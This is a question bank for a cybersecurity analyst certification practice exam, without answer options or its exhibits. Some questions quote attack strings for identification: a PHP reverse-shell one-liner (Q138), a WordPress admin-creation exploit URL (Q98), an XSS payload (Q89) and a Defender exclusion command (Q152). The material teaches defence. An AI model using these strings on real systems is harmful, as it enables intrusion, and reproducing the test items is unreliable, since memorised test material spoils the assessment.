EMT Practice Test

1. Question Content...


Question List

Question1: The management team requests monthly KPI reports on the company's cybersecurity program.
Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?

Question2: The Chief Information Security Officer (CISO) of a large financial institution is seeking a solution that will block a predetermined set of data points from being transferred or downloaded by employees. The CISO also wants to track the data assets by name, type, content, or data profile.
Which of the following BEST describes what the CIS wants to purchase?

Question3: A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:
- Must use minimal network bandwidth
- Must use minimal host resources
- Must provide accurate, near real-time updates
- Must not have any stored credentials in configuration on the scanner
Which of the following vulnerability scanning methods should be used to best meet these requirements?

Question4: An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?

Question5: Company A is in the process of merging with Company B. As part of the merger, connectivity between the ERP systems must be established so pertinent financial information can be shared between the two entities. Which of the following will establish a more automated approach to secure data transfers between the two entities?

Question6: A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script:

Which of the following scripting languages was used in the script?

Question7: A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

Question8: During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in confirmed malware activity. The analyst also notes there is no other alert in place for this traffic After resolving the security incident, which of the following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?

Question9: During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

Question10: A security analyst found an old version of OpenSSH running on a DMZ server and determined the following piece of code could have led to a command execution through an integer overflow;

Which of the following controls must be in place to prevent this vulnerability?

Question11: An organization's internal department frequently uses a cloud provider to store large amounts of sensitive data. A threat actor has deployed a virtual machine to attack another virtual machine to gain access to the data. Through the use of the cloud host's hypervisor, the threat actor has escalated the access rights. Which of the following actions would be BEST to remediate the vulnerability the attacker has used to exploit the system?

Question12: An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

Question13: An organization's email account was compromised by a bad actor. Given the following information:

Which of the following is the length of time the team took to detect the threat?

Question14: An organization wants to implement a privileged access management solution to better manage the use to emergency and privileged service accounts. Which of the following would BEST satisfy the organization's goal?

Question15: A company is implementing a vulnerability management program and moving from an on- premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?

Question16: Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

Question17: The security team at a company, which was a recent target of ransomware, compiled a list of hosts that were identified as impacted and in scope for this incident. Based on the following host list:

Which of the following systems was most pivotal to the threat actor in its distribution of the encryption binary via Group Policy?

Question18: A new zero-day vulnerability was released. A security analyst is prioritizing which systems should receive deployment of compensating controls deployment first. The systems have been grouped into the categories shown below:

Which of the following groups should be prioritized for compensating controls?

Question19: A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnerabilities, including SQL injection, RFI, XSS, etc. Which of the following would most likely meet the requirement?

Question20: A Chief Information Security Officer has asked for a list of hosts that have critical and high- seventy findings as referenced in the CVE database. Which of the following tools would produce the assessment output needed to satisfy this request?

Question21: Some hard disks need to be taken as evidence for further analysis during an incident response.
Which of the following procedures must be completed FIRST for this type of evidence acquisition?

Question22: Which of the following best describes the process of requiring remediation of a known threat within a given time frame?

Question23: Which of the following is the first step that should be performed when establishing a disaster recovery plan?

Question24: A security analyst observed the following activities in chronological order:
1. Protocol violation alerts on external firewall
2. Unauthorized internal scanning activity
3. Changes in outbound network performance
Which of the following best describes the goal of the threat actor?

Question25: An analyst is examining events in multiple systems but is having difficulty correlating data points.
Which of the following is most likely the issue with the system?

Question26: A software developer is correcting the error-handling capabilities of an application following the initial coding of the fix.
Which of the following would the software developer MOST likely performed to validate the code poor to pushing it to production?

Question27: Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

Question28: A cybersecurity team lead is developing metrics to present in the weekly executive briefs.
Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?

Question29: A developer is working on a program to convert user-generated input in a web form before it is displayed by the browser. This technique is referred to as:

Question30: A security analyst discovers an ongoing ransomware attack while investigating a phishing email.
The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

Question31: A security analyst is reviewing a firewall usage report that contains traffic generated over the last
30 minutes in order to locate unusual traffic patterns:

Which of the following source IP addresses does the analyst need to investigate further?

Question32: A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notifications according to company policy.
Which of the following technologies was deployed?

Question33: Which of the following is a nation-state actor least likely to be concerned with?

Question34: A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?

Question35: An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

Question36: A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?

Question37: The security analyst received the monthly vulnerability report. The following findings were included in the report:
- Five of the systems only required a reboot to finalize the patch
application
- Two of the servers are running outdated operating systems and cannot
be patched
The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

Question38: A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?

Question39: A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?

Question40: A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?

Question41: A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for classifying data?

Question42: The email system administrator for an organization configured DKIM signing for all email legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company's domain name is used as both the sender and the recipient?

Question43: A company has decided to expose several systems to the internet. The systems are currently available internally only. A security analyst is using a subset of CVSS3.1 exploitability metrics to prioritize the vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The systems and the vulnerabilities are shown below:

Which of the following systems should be prioritized for patching?

Question44: During an incident, a security analyst discovers a large amount of Pll has been emailed externally from an employee to a public email address. The analyst finds that the external email is the employee's personal email. Which of the following should the analyst recommend be done first?

Question45: An incident response team member is triaging a Linux server. The output is shown below:

Which of the following is the adversary most likely trying to do?

Question46: An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?

Question47: Which of the following BEST identifies the appropriate use of threat intelligence as a function of detection and response?

Question48: A security analyst is concerned the number of security incidents being reported has suddenly gone down. Daily business interactions have not changed, and no additional security controls have been implemented.
Which of the following should the analyst review FIRST?

Question49: A security analyst scans a host and generates the following output:

Which of the following best describes the output?

Question50: Hotspot Question
A security analyst performs various types of vulnerability scans. You must review the vulnerability scan results to determine the type of scan that was executed and determine if a false positive occurred for each device.
Instructions:
Select the drop option for whether the results were generated from a credentialed scan, non- credentialed scan, or a compliance scan.
For ONLY the credentialed and non-credentialed scans, evaluate the results for false positives and check the findings that display false positives.
NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time. Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server to the results.
The Linux Web Server, File-Print Server and Directory Server are draggable.
If at any time you would like to bring back the initial state of the simulation, please select the Reset button. When you have completed the simulation, please select the Done button to submit.
Once the simulation is submitted, please select the Next button to continue.

Question51: An incident response team detected malicious software that could have gained access to credit card data. The incident response team was able to mitigate significant damage and implement corrective actions. By having incident response mechanisms in place. Which of the following should be notified for lessons learned?

Question52: Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

Question53: A web developer reports the following error that appeared on a development server when testing a new application:

Which of the following tools can be used to identify the application's point of failure?

Question54: An IT security analyst has received an email alert regarding a vulnerability within the new fleet of vehicles the company recently purchased. Which of the following attack vectors is the vulnerability MOST likely targeting?

Question55: A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?

Question56: A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

Question57: After reviewing the final report for a penetration test, a cybersecurity analyst prioritizes the remediation for input validation vulnerabilities. Which of the following attacks is the analyst seeking to prevent?

Question58: Which of the following security operations tasks are ideal for automation?

Question59: Which of the following, BEST explains the function of TPM?

Question60: A security analyst discovers suspicious host activity while performing monitoring activities. The analyst pulls a packet capture for the activity and sees the following:

Follow TCP stream:

Which of the following describes what has occurred?

Question61: During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability?

Question62: A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities should have the highest priority for the mitigation process?

Question63: A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture:

Which of the following generated the above output?

Question64: An analyst is responding to an incident involving an attack on a company-owned mobile device that was being used by an employee to collect data from clients in the field. Malware was loaded on the device via the installation of a third-party software package. The analyst has baselined the device. Which of the following should the analyst do to BEST mitigate future attacks?

Question65: Which of the following is a difference between SOAR and SCAP?

Question66: A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?

Question67: Which of the following is the software development process by which function, usability, and scenarios are tested against a known set of base requirements?

Question68: A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?

Question69: The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities were reviewed for malicious or anomalous connections, data uploads/downloads, and exploits. A review of the controls confirmed multifactor authentication was enabled. Which of the following should be done first to mitigate impact to the business networks and assets?

Question70: An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violated?

Question71: A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach the network and remain inside of it for an extended period of time. Which of the following techniques should be performed to meet the CISO's goals?

Question72: An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

Question73: An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst's concern?

Question74: A company uses an FTP server to support its critical business functions. The FTP server is configured as follows:
- The FTP service is running with the data directory configured in /opt/ftp/data.
- The FTP server hosts employees' home directories in /home.
- Employees may store sensitive information in their home directories.
An IoC revealed that an FTP directory traversal attack resulted in sensitive data loss.
Which of the following should a server administrator implement to reduce the risk of current and future directory traversal attacks targeted at the FTP server?

Question75: Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

Question76: A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

Question77: Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

Question78: A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web interface:

Which of the following exploits is most likely being attempted?

Question79: A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

Question80: A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

Which of the following best describes the suspicious activity that is occurring?

Question81: An analyst is responding to an incident within a cloud infrastructure. Based on the logs and traffic analysis, the analyst thinks a container has been compromised.
Which of the following should the analyst do FIRST?

Question82: Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:

Which of the following choices should the analyst look at first?

Question83: The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

Question84: A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?

Question85: An organization has the following policy statements:
- AlI emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized coolant.
- All network activity will be logged and monitored.
- Confidential data will be tagged and tracked
- Confidential data must never be transmitted in an unencrypted form.
- Confidential data must never be stored on an unencrypted mobile device.
Which of the following is the organization enforcing?

Question86: Forming a hypothesis, looking for indicators of compromise, and using the findings to proactively improve detection capabilities are examples of the value of:

Question87: Which of following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?

Question88: A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

Question89: While reviewing web server logs, a security analyst found the following line:
< IMG SRC='vbscript:msgbox("test")' >
Which of the following malicious activities was attempted?

Question90: A company offers a hardware security appliance to customers that provides remote administration of a device on the customer's network. Customers are not authorized to alter the configuration. The company deployed a software process to manage unauthorized changes to the appliance log them, and forward them to a central repository for evaluation.
Which of the following processes is the company using to ensure the appliance is not altered from its original configured state?

Question91: A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

Question92: Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

Question93: The analyst reviews the following endpoint log entry:

Which of the following has occurred?

Question94: A technician is analyzing output from a popular network mapping tool for a PCI audit:

Which of the following best describes the output?

Question95: An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:
* created the initial evidence log.
* disabled the wireless adapter on the device.
* interviewed the employee, who was unable to identify the website that was accessed
* reviewed the web proxy traffic logs.
Which of the following should the analyst do to remediate the infected device?

Question96: A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

Question97: The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released.
Which of the following would best protect this organization?

Question98: An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers.
The exploit contained the following snippet:
/wp-
json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator
Which of the following controls would work best to mitigate the attack represented by this snippet?

Question99: A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:
- DNS traffic while a tunneling session is active.
- The mean time between queries is less than one second.
- The average query length exceeds 100 characters.
Which of the following attacks most likely occurred?

Question100: A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?

Question101: An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

Question102: Which of the following is MOST important when developing a threat hunting program?

Question103: A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following:

Which of the following vulnerabilities is the security analyst trying to validate?

Question104: Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased cost. Which of the following risk treatments best describes what the CISO is looking for?

Question105: A security learn implemented a SCM as part for its security-monitoring program there is a requirement to integrate a number of sources Into the SIEM to provide better context relative to the events being processed. Which of the following BST describes the result the security learn hopes to accomplish by adding these sources?

Question106: Which of the following BEST describes what an organizations incident response plan should cover regarding how the organization handles public or private disclosures of an incident?

Question107: Which of the following BEST describes HSM?

Question108: A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

Question109: An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?

Question110: An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

Question111: An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?

Question112: An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?

Question113: Which of the following describes the best reason for conducting a root cause analysis?

Question114: A company's application development has been outsourced to a third-party development team.
Based on the SLA, the development team must follow industry best practices for secure coding.
Which of the following is the BEST way to verify this agreement?

Question115: A consultant evaluating multiple threat intelligence leads to assess potential risks for a client.
Which of the following is the BEST approach for the consultant to consider when modeling the client's attack surface?

Question116: A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

Question117: An analyst is reviewing the following output as part of an incident:

Which of the following is MOST likely happening?

Question118: Which of the following does "federation" most likely refer to within the context of identity and access management?

Question119: A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?

Question120: A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?

Question121: A security analyst needs to provide the development team with secure connectivity from the corporate network to a three-tier cloud environment. The developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to provide secure transport?

Question122: Which of the following should be updated after a lessons-learned review?

Question123: A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

Question124: During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?

Question125: An organization discovered a data breach that resulted in PII being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?

Question126: Due to a rise in cyber attackers seeking PHI, a healthcare company that collects highly sensitive data from millions of customers is deploying a solution that will ensure the customers' data is protected by the organization internally and externally.
Which of the following countermeasures can BEST prevent the loss of customers' sensitive data?

Question127: A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

Question128: Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff members should take when they arrive?

Question129: A company's legal and accounting teams have decided it would be more cost-effective to offload the risks of data storage to a third party. The IT management team has decided to implement a cloud model and has asked the security team for recommendations.
Which of the following will allow all data to be kept on the third-party network?

Question130: An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?

Question131: Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

Question132: A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

Question133: A threat hurting team received a new loC from an ISAC that follows a threat actor's profile and activities. Which of the following should be updated NEXT?

Question134: A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:

Which of the following should be completed first to remediate the findings?

Question135: While conducting a cloud assessment, a security analyst performs a Prowler scan, which generates the following within the report:

Based on the Prowler report, which of the following is the BEST recommendation?

Question136: A company's domain has been spooled in numerous phishing campaigns. An analyst needs to determine the company is a victim of domain spoofing, despite having a DMARC record that should tell mailbox providers to ignore any email that fails DMARC upon review of the record, the analyst finds the following:
v=DMARC1; p=none; fo=0; rua=mailto:
[email protected];
ruf=mailto:[email protected]; adkim=r; rf=afrf; ri=86400;
Which of the following BEST explains the reason why the company's requirements are not being processed correctly by mailbox providers?

Question137: A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?

Question138: While reviewing web server logs, a security analyst discovers the following suspicious line:
php -r '$socket=fsockopen("10.0.0.1", 1234); passthru ("/bin/sh -i
<&3 >&3 2>&3");'
Which of the following is being attempted?

Question139: A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?

Question140: An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?

Question141: There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

Question142: During the log analysis phase, the following suspicious command is detected:

Which of the following is being attempted?

Question143: An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request?

Question144: A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

Question145: A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

Question146: SIMULATION
You are a penetration tester who is reviewing the system hardening guidelines for a company's distribution center. The company's hardening guidelines indicate the following:
- There must be one primary server or service per device.
- Only default ports should be used.
- Non-secure protocols should be disabled.
- The corporate Internet presence should be placed in a protected subnet.
INSTRUCTIONS
Using the tools available, discover devices on the corporate network and the services that are running on these devices.
You must determine:
- The IP address of each device.
- The primary server or service of each device.
- The protocols that should be disabled based on the hardening guidelines.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question147: An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

Question148: A security analyst must preserve a system hard drive that was involved in a litigation request.
Which of the following is the best method to ensure the data on the device is not modified?

Question149: The help desk is having difficulty keeping up with all onboarding and offboarding requests.
Managers often submit, requests for new users at the last minute. causing the help desk to scramble to create accounts across many different Interconnected systems. Which of the following solutions would work BEST to assist the help desk with the onboarding and offboarding process while protecting the company's assets?

Question150: A company has the following security requirements:
- No public IPs
- All data secured at rest
- No insecure ports/protocols
After a cloud scan is completed a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

Question151: An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain does this describe?

Question152: An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high volume of random DNS queries begin to originate from the system. An investigation on the system reveals the following:
Add-MpPreference - ExclusionPath '%Program Files%\ksyconfig'
Which of the following is possibly occurring?

Question153: In SIEM software, a security analysis selected some changes to hash signatures from monitored files during the night followed by SMB brute-force attacks against the file servers Based on this behavior, which of the following actions should be taken FIRST to prevent a more serious compromise?

Question154: Which of the following can be used to learn more about TTPs used by cybercriminals?